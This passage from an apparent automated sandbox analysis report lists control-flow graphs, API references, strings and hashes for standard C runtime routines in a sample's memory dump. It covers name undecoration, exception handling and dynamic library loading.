1711->1712 1712->1700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Replicator::operator[]
                                                                                          • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                          • API String ID: 3676697650-3207858774
                                                                                          • Opcode ID: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                          • Instruction ID: b5c5640df7dcb937c0033f08ff8f980e5b36e6882d1b4293bf9711aad441de39
                                                                                          • Opcode Fuzzy Hash: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                          • Instruction Fuzzy Hash: A591AEA2B18E8699FB21EF22D4512B833B1AB54F68F4481F3DA5D036A5DF3CE565C340

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID:
                                                                                          • API String ID: 2943138195-0
                                                                                          • Opcode ID: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                          • Instruction ID: 6fb72a7b33907f36b10538f7b77f9c94779bffe61cc6cabd7b9bce20e22d6a9b
                                                                                          • Opcode Fuzzy Hash: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                          • Instruction Fuzzy Hash: 797140B2B05E46ADFB11EF62D4501FC33B1AB45B9CB4048B2DA0D57AAADF34D625C390

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1783 7ffe1a45aac8-7ffe1a45aaec 1784 7ffe1a45aaee-7ffe1a45ab27 call 7ffe1a457680 call 7ffe1a457a34 1783->1784 1785 7ffe1a45ab29-7ffe1a45ab34 1783->1785 1802 7ffe1a45ab82-7ffe1a45ab96 1784->1802 1786 7ffe1a45ab97-7ffe1a45aba8 1785->1786 1787 7ffe1a45ab36-7ffe1a45ab45 1785->1787 1790 7ffe1a45ab47-7ffe1a45ab54 1786->1790 1791 7ffe1a45abaa-7ffe1a45abaf 1786->1791 1789 7ffe1a45abb1-7ffe1a45abc7 1787->1789 1787->1790 1793 7ffe1a45acae-7ffe1a45acbc 1789->1793 1794 7ffe1a45abcd-7ffe1a45abd0 1789->1794 1796 7ffe1a45ab5f-7ffe1a45ab7f call 7ffe1a45d274 call 7ffe1a457ae0 1790->1796 1797 7ffe1a45ab56-7ffe1a45ab5a call 7ffe1a45acc4 1790->1797 1791->1789 1791->1790 1793->1802 1798 7ffe1a45ac85 1794->1798 1799 7ffe1a45abd6-7ffe1a45abd9 1794->1799 1796->1802 1797->1796 1804 7ffe1a45ac8c 1798->1804 1805 7ffe1a45abdf-7ffe1a45abe2 1799->1805 1806 7ffe1a45ac76-7ffe1a45ac83 1799->1806 1808 7ffe1a45ac92-7ffe1a45ac96 call 7ffe1a457494 1804->1808 1809 7ffe1a45ac6d-7ffe1a45ac74 1805->1809 1810 7ffe1a45abe8-7ffe1a45abeb 1805->1810 1806->1808 1816 7ffe1a45ac9b-7ffe1a45aca9 1808->1816 1809->1804 1813 7ffe1a45ac1a-7ffe1a45ac6b call 7ffe1a45acc4 call 7ffe1a457680 call 7ffe1a4579dc 1810->1813 1814 7ffe1a45abed-7ffe1a45abf0 1810->1814 1813->1816 1817 7ffe1a45abf2-7ffe1a45abf5 1814->1817 1818 7ffe1a45ac0b-7ffe1a45ac18 1814->1818 1816->1796 1817->1816 1820 7ffe1a45abfb-7ffe1a45ac06 1817->1820 1818->1808 1820->1808
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                          • API String ID: 2943138195-1464470183
                                                                                          • Opcode ID: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                          • Instruction ID: 6fc5acf3494eeb3f8701cc411fabb80c64b441b178f4a56e7a5f9de271fbf314
                                                                                          • Opcode Fuzzy Hash: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                          • Instruction Fuzzy Hash: 89518CB2F08F52C9FB11EB66E8841BC27B1BB05B64F5040F6DA5D13AA9DF28E564C340

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1826 7ffe1a4537f8-7ffe1a45385b call 7ffe1a45f510 1829 7ffe1a453874-7ffe1a45387d call 7ffe1a456e48 1826->1829 1830 7ffe1a45385d-7ffe1a453866 call 7ffe1a456e48 1826->1830 1835 7ffe1a453893-7ffe1a453896 1829->1835 1836 7ffe1a45387f-7ffe1a45388c call 7ffe1a456e48 * 2 1829->1836 1837 7ffe1a453ca2-7ffe1a453ca8 abort 1830->1837 1838 7ffe1a45386c-7ffe1a453872 1830->1838 1835->1837 1840 7ffe1a45389c-7ffe1a4538a8 1835->1840 1836->1835 1841 7ffe1a453ca9-7ffe1a453cc8 call 7ffe1a460910 1837->1841 1838->1835 1843 7ffe1a4538d3 1840->1843 1844 7ffe1a4538aa-7ffe1a4538d1 1840->1844 1848 7ffe1a4538d5-7ffe1a4538d7 1843->1848 1844->1848 1848->1837 1850 7ffe1a4538dd-7ffe1a4538e3 1848->1850 1851 7ffe1a4539af-7ffe1a4539c5 call 7ffe1a454a70 1850->1851 1852 7ffe1a4538e9-7ffe1a4538ed 1850->1852 1857 7ffe1a453c5e-7ffe1a453c62 1851->1857 1858 7ffe1a4539cb-7ffe1a4539cf 1851->1858 1852->1851 1854 7ffe1a4538f3-7ffe1a4538fe 1852->1854 1854->1851 1856 7ffe1a453904-7ffe1a453909 1854->1856 1856->1851 1859 7ffe1a45390f-7ffe1a453919 call 7ffe1a456e48 1856->1859 1860 7ffe1a453c64-7ffe1a453c6b 1857->1860 1861 7ffe1a453c96-7ffe1a453ca0 call 7ffe1a456e48 1857->1861 1858->1857 1862 7ffe1a4539d5-7ffe1a4539e0 1858->1862 1859->1841 1870 7ffe1a45391f-7ffe1a453945 call 7ffe1a456e48 * 2 call 7ffe1a4603e4 1859->1870 1860->1837 1865 7ffe1a453c6d-7ffe1a453c91 call 7ffe1a453f60 1860->1865 1861->1837 1861->1841 1862->1857 1867 7ffe1a4539e6-7ffe1a4539ea 1862->1867 1865->1861 1868 7ffe1a453c30-7ffe1a453c34 1867->1868 1869 7ffe1a4539f0-7ffe1a453a2b call 7ffe1a45fdbc 1867->1869 1868->1861 1875 7ffe1a453c36-7ffe1a453c43 call 7ffe1a45faf4 1868->1875 1869->1868 1880 7ffe1a453a31-7ffe1a453a3d 1869->1880 1894 7ffe1a453965-7ffe1a45396f call 7ffe1a456e48 1870->1894 1895 7ffe1a453947-7ffe1a45394b 1870->1895 1875->1861 1882 7ffe1a453c45-7ffe1a453c5d call 7ffe1a456e48 * 2 terminate 1875->1882 1883 7ffe1a453a41-7ffe1a453a51 1880->1883 1882->1857 1886 7ffe1a453b8b-7ffe1a453c2a 1883->1886 1887 7ffe1a453a57-7ffe1a453a5d 1883->1887 1886->1868 1886->1883 1887->1886 1890 7ffe1a453a63-7ffe1a453a8c call 7ffe1a4549ec 1887->1890 1890->1886 1900 7ffe1a453a92-7ffe1a453ad9 call 7ffe1a4603b8 * 2 1890->1900 1894->1851 1904 7ffe1a453971-7ffe1a453991 call 7ffe1a456e48 * 2 call 7ffe1a455800 1894->1904 1895->1894 1898 7ffe1a45394d-7ffe1a453958 1895->1898 1898->1894 1901 7ffe1a45395a-7ffe1a45395f 1898->1901 1912 7ffe1a453b15-7ffe1a453b2b call 7ffe1a455090 1900->1912 1913 7ffe1a453adb-7ffe1a453b00 call 7ffe1a4603b8 call 7ffe1a454398 1900->1913 1901->1837 1901->1894 1921 7ffe1a453993-7ffe1a45399d call 7ffe1a4558f0 1904->1921 1922 7ffe1a4539aa 1904->1922 1912->1900 1923 7ffe1a453b31 1912->1923 1927 7ffe1a453b02-7ffe1a453b0e 1913->1927 1928 7ffe1a453b33-7ffe1a453b82 call 7ffe1a453260 1913->1928 1931 7ffe1a4539a3-7ffe1a4539a9 terminate 1921->1931 1932 7ffe1a453cc9-7ffe1a453cef call 7ffe1a452960 call 7ffe1a454b90 call 7ffe1a456b10 1921->1932 1922->1851 1926 7ffe1a453b87 1923->1926 1926->1886 1927->1913 1930 7ffe1a453b10 1927->1930 1928->1926 1930->1912 1931->1922
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 211107550-393685449
                                                                                          • Opcode ID: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                          • Instruction ID: 84db0f3033635d0a868e712f29b609f6a017eeff5fc66594e5dbf62a63eb592f
                                                                                          • Opcode Fuzzy Hash: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                          • Instruction Fuzzy Hash: 60E1D2B3B08B828AE751AF36D4903BD77A0FB45B68F1401B6DA4D57666CF38E5A1C700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1940 7ffe1a45c7f8-7ffe1a45c81b 1941 7ffe1a45c994-7ffe1a45c9a2 1940->1941 1942 7ffe1a45c821-7ffe1a45c824 1940->1942 1943 7ffe1a45c9a6-7ffe1a45c9ac call 7ffe1a4579dc 1941->1943 1944 7ffe1a45c8b2-7ffe1a45c8b5 1942->1944 1945 7ffe1a45c82a-7ffe1a45c82d 1942->1945 1951 7ffe1a45c9b1-7ffe1a45c9c3 1943->1951 1947 7ffe1a45c8fd-7ffe1a45c900 1944->1947 1948 7ffe1a45c8b7-7ffe1a45c8bb 1944->1948 1949 7ffe1a45c82f-7ffe1a45c840 1945->1949 1950 7ffe1a45c896-7ffe1a45c899 1945->1950 1954 7ffe1a45c919-7ffe1a45c929 call 7ffe1a4594b8 1947->1954 1957 7ffe1a45c902-7ffe1a45c914 call 7ffe1a459164 1947->1957 1953 7ffe1a45c8bd-7ffe1a45c8c1 1948->1953 1948->1954 1955 7ffe1a45c842-7ffe1a45c849 1949->1955 1956 7ffe1a45c86a-7ffe1a45c871 1949->1956 1950->1944 1952 7ffe1a45c89b-7ffe1a45c89f 1950->1952 1952->1944 1961 7ffe1a45c8a1-7ffe1a45c8a5 1952->1961 1953->1954 1962 7ffe1a45c8c3-7ffe1a45c8d5 1953->1962 1972 7ffe1a45c92b-7ffe1a45c932 1954->1972 1973 7ffe1a45c96c-7ffe1a45c973 1954->1973 1963 7ffe1a45c850-7ffe1a45c865 call 7ffe1a457680 1955->1963 1959 7ffe1a45c878-7ffe1a45c891 call 7ffe1a457680 1956->1959 1957->1951 1959->1943 1961->1944 1967 7ffe1a45c8a7-7ffe1a45c8ab 1961->1967 1968 7ffe1a45c8ea-7ffe1a45c8f8 1962->1968 1969 7ffe1a45c8d7-7ffe1a45c8e5 1962->1969 1963->1951 1967->1944 1968->1959 1969->1963 1975 7ffe1a45c939-7ffe1a45c96a call 7ffe1a457680 call 7ffe1a4579dc 1972->1975 1976 7ffe1a45c985-7ffe1a45c988 1973->1976 1977 7ffe1a45c975-7ffe1a45c983 1973->1977 1979 7ffe1a45c98c-7ffe1a45c992 1975->1979 1976->1979 1977->1975 1979->1951
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                          • API String ID: 2943138195-2239912363
                                                                                          • Opcode ID: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                          • Instruction ID: a50961141b2aa76dd593645c823cb9b5a686f9e17db93be2c79e1738c74976c0
                                                                                          • Opcode Fuzzy Hash: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                          • Instruction Fuzzy Hash: C2513BA2F18F5298FB519B62D8402BD37B0BB08B68F4442F7DA4D13AA5DF3C91A4C754

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                          • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                          • API String ID: 1852475696-928371585
                                                                                          • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                          • Instruction ID: 94ed81efe7f57d1ae8c2a69ed7d50f2aa5380855d6dfe5f07c6e85ae284c8123
                                                                                          • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                          • Instruction Fuzzy Hash: 7B5190A2B19E8692DA20EB12F8502B9A360FF44FA4F0445B3DA5D43778DF3CE525C700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2033 7ffe1a456fe4-7ffe1a457022 2034 7ffe1a4570d7 2033->2034 2035 7ffe1a457028-7ffe1a45702b 2033->2035 2036 7ffe1a4570d9-7ffe1a4570f5 2034->2036 2035->2036 2037 7ffe1a457031-7ffe1a457034 2035->2037 2038 7ffe1a4570cf 2037->2038 2039 7ffe1a45703a-7ffe1a457049 2037->2039 2038->2034 2040 7ffe1a45704b-7ffe1a45704e 2039->2040 2041 7ffe1a457056-7ffe1a457075 LoadLibraryExW 2039->2041 2042 7ffe1a457054 2040->2042 2043 7ffe1a457116-7ffe1a457125 GetProcAddress 2040->2043 2044 7ffe1a4570f6-7ffe1a45710b 2041->2044 2045 7ffe1a457077-7ffe1a457080 GetLastError 2041->2045 2048 7ffe1a4570c2-7ffe1a4570c9 2042->2048 2043->2038 2047 7ffe1a457127-7ffe1a457132 2043->2047 2044->2043 2046 7ffe1a45710d-7ffe1a457110 FreeLibrary 2044->2046 2049 7ffe1a457082-7ffe1a457098 wcsncmp 2045->2049 2050 7ffe1a4570b0-7ffe1a4570ba 2045->2050 2046->2043 2047->2036 2048->2038 2048->2039 2049->2050 2051 7ffe1a45709a-7ffe1a4570ae LoadLibraryExW 2049->2051 2050->2048 2051->2044 2051->2050
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457069
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457077
                                                                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457090
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A4570A2
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A457110
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FFE1A4571A3,?,?,00000000,00007FFE1A456FD4,?,?,?,?,00007FFE1A456D11), ref: 00007FFE1A45711C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 916704608-2084034818
                                                                                          • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                          • Instruction ID: 6664a0b00e140a49ea41bd201f55bccb93ae670519e61bde195a6ec51cb72521
                                                                                          • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                          • Instruction Fuzzy Hash: D4316F61B1AF8295EE11EB03A8005B563E4BF44FB4F5949B6DD2E4B3A4EF3CE5648300

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2052 7ffe1a452c38-7ffe1a452c63 2053 7ffe1a452c74-7ffe1a452c77 2052->2053 2054 7ffe1a452c65-7ffe1a452c72 call 7ffe1a4603a4 2052->2054 2056 7ffe1a452c7a-7ffe1a452c7d 2053->2056 2054->2056 2058 7ffe1a452c83-7ffe1a452c86 2056->2058 2059 7ffe1a452e00 2056->2059 2061 7ffe1a452c88-7ffe1a452c97 call 7ffe1a4603a4 2058->2061 2062 7ffe1a452c99 2058->2062 2060 7ffe1a452e02-7ffe1a452e1b 2059->2060 2064 7ffe1a452c9c-7ffe1a452ca0 2061->2064 2062->2064 2064->2059 2066 7ffe1a452ca6-7ffe1a452ca9 2064->2066 2067 7ffe1a452cb3-7ffe1a452cb5 2066->2067 2068 7ffe1a452cab-7ffe1a452cad 2066->2068 2069 7ffe1a452cc1-7ffe1a452cc4 2067->2069 2070 7ffe1a452cb7-7ffe1a452cbe 2067->2070 2068->2059 2068->2067 2071 7ffe1a452cf6-7ffe1a452cf9 2069->2071 2072 7ffe1a452cc6-7ffe1a452cca 2069->2072 2070->2069 2074 7ffe1a452d14-7ffe1a452d18 2071->2074 2075 7ffe1a452cfb-7ffe1a452d02 2071->2075 2072->2071 2073 7ffe1a452ccc-7ffe1a452cd6 2072->2073 2073->2071 2078 7ffe1a452cd8-7ffe1a452ce1 2073->2078 2076 7ffe1a452d62-7ffe1a452d66 2074->2076 2077 7ffe1a452d1a-7ffe1a452d21 2074->2077 2079 7ffe1a452d04-7ffe1a452d07 2075->2079 2080 7ffe1a452d0e abort 2075->2080 2083 7ffe1a452d77-7ffe1a452d7a 2076->2083 2084 7ffe1a452d68-7ffe1a452d75 call 7ffe1a4603b8 2076->2084 2081 7ffe1a452d23-7ffe1a452d26 2077->2081 2082 7ffe1a452d5c abort 2077->2082 2094 7ffe1a452ce3-7ffe1a452ce6 2078->2094 2095 7ffe1a452cf0 abort 2078->2095 2079->2080 2085 7ffe1a452d09-7ffe1a452d0c 2079->2085 2080->2074 2081->2082 2087 7ffe1a452d28-7ffe1a452d39 call 7ffe1a461090 2081->2087 2082->2076 2086 7ffe1a452d7c-7ffe1a452d7f 2083->2086 2084->2086 2090 7ffe1a452d4b-7ffe1a452d57 call 7ffe1a452a20 2085->2090 2091 7ffe1a452db3-7ffe1a452db7 2086->2091 2092 7ffe1a452d81-7ffe1a452d85 2086->2092 2106 7ffe1a452dee-7ffe1a452df0 2087->2106 2107 7ffe1a452d3f-7ffe1a452d42 2087->2107 2090->2106 2103 7ffe1a452df2-7ffe1a452dff abort * 2 2091->2103 2104 7ffe1a452db9-7ffe1a452dbc 2091->2104 2098 7ffe1a452dad abort 2092->2098 2099 7ffe1a452d87-7ffe1a452d8a 2092->2099 2094->2095 2101 7ffe1a452ce8-7ffe1a452cee 2094->2101 2095->2071 2098->2091 2099->2098 2105 7ffe1a452d8c-7ffe1a452dab call 7ffe1a452a20 call 7ffe1a461090 2099->2105 2101->2090 2103->2059 2104->2103 2108 7ffe1a452dbe-7ffe1a452dc0 2104->2108 2105->2106 2106->2060 2107->2106 2110 7ffe1a452d48 2107->2110 2111 7ffe1a452dc2-7ffe1a452dd1 call 7ffe1a4603b8 2108->2111 2112 7ffe1a452dd3 2108->2112 2110->2090 2113 7ffe1a452dd6-7ffe1a452dd9 2111->2113 2112->2113 2113->2103 2116 7ffe1a452ddb-7ffe1a452dea 2113->2116 2116->2106
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1501936508-0
                                                                                          • Opcode ID: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                          • Instruction ID: a4978e7ee7698631ff501eb76c3296e22e32bc2b5e6074913a1a1f1cd7a594c8
                                                                                          • Opcode Fuzzy Hash: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                          • Instruction Fuzzy Hash: 6B51B4A1B09F4281FAA6AB13944467863A4AF44FB4B0944F7EE5D077B5DF3CE466C700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2120 7ffe1a452e1c-7ffe1a452e47 2121 7ffe1a452e58-7ffe1a452e5b 2120->2121 2122 7ffe1a452e49-7ffe1a452e56 call 7ffe1a4603a4 2120->2122 2124 7ffe1a452e5e-7ffe1a452e61 2121->2124 2122->2124 2126 7ffe1a452fe7 2124->2126 2127 7ffe1a452e67-7ffe1a452e6a 2124->2127 2128 7ffe1a452fe9-7ffe1a453002 2126->2128 2129 7ffe1a452e6c-7ffe1a452e7b call 7ffe1a4603a4 2127->2129 2130 7ffe1a452e7d 2127->2130 2131 7ffe1a452e80-7ffe1a452e84 2129->2131 2130->2131 2131->2126 2134 7ffe1a452e8a-7ffe1a452e8d 2131->2134 2135 7ffe1a452e8f-7ffe1a452e92 2134->2135 2136 7ffe1a452e98-7ffe1a452e9b 2134->2136 2135->2126 2135->2136 2137 7ffe1a452e9d-7ffe1a452ea3 2136->2137 2138 7ffe1a452ea6-7ffe1a452eaa 2136->2138 2137->2138 2139 7ffe1a452edc-7ffe1a452ee0 2138->2139 2140 7ffe1a452eac-7ffe1a452eb0 2138->2140 2141 7ffe1a452ee2-7ffe1a452ee9 2139->2141 2142 7ffe1a452efb-7ffe1a452eff 2139->2142 2140->2139 2143 7ffe1a452eb2-7ffe1a452ebc 2140->2143 2144 7ffe1a452ef5 abort 2141->2144 2145 7ffe1a452eeb-7ffe1a452eee 2141->2145 2146 7ffe1a452f01-7ffe1a452f08 2142->2146 2147 7ffe1a452f49-7ffe1a452f4d 2142->2147 2143->2139 2148 7ffe1a452ebe-7ffe1a452ec7 2143->2148 2144->2142 2145->2144 2151 7ffe1a452ef0-7ffe1a452ef3 2145->2151 2152 7ffe1a452f43 abort 2146->2152 2153 7ffe1a452f0a-7ffe1a452f0d 2146->2153 2149 7ffe1a452f5e-7ffe1a452f61 2147->2149 2150 7ffe1a452f4f-7ffe1a452f5c call 7ffe1a4603b8 2147->2150 2163 7ffe1a452ed6 abort 2148->2163 2164 7ffe1a452ec9-7ffe1a452ecc 2148->2164 2156 7ffe1a452f63-7ffe1a452f66 2149->2156 2150->2156 2155 7ffe1a452f32-7ffe1a452f3e call 7ffe1a452a20 2151->2155 2152->2147 2153->2152 2157 7ffe1a452f0f-7ffe1a452f20 call 7ffe1a461090 2153->2157 2173 7ffe1a452fd5-7ffe1a452fd7 2155->2173 2160 7ffe1a452f9a-7ffe1a452f9e 2156->2160 2161 7ffe1a452f68-7ffe1a452f6c 2156->2161 2157->2173 2176 7ffe1a452f26-7ffe1a452f29 2157->2176 2166 7ffe1a452fa0-7ffe1a452fa3 2160->2166 2167 7ffe1a452fd9-7ffe1a452fe6 abort * 2 2160->2167 2168 7ffe1a452f94 abort 2161->2168 2169 7ffe1a452f6e-7ffe1a452f71 2161->2169 2163->2139 2164->2163 2171 7ffe1a452ece-7ffe1a452ed4 2164->2171 2166->2167 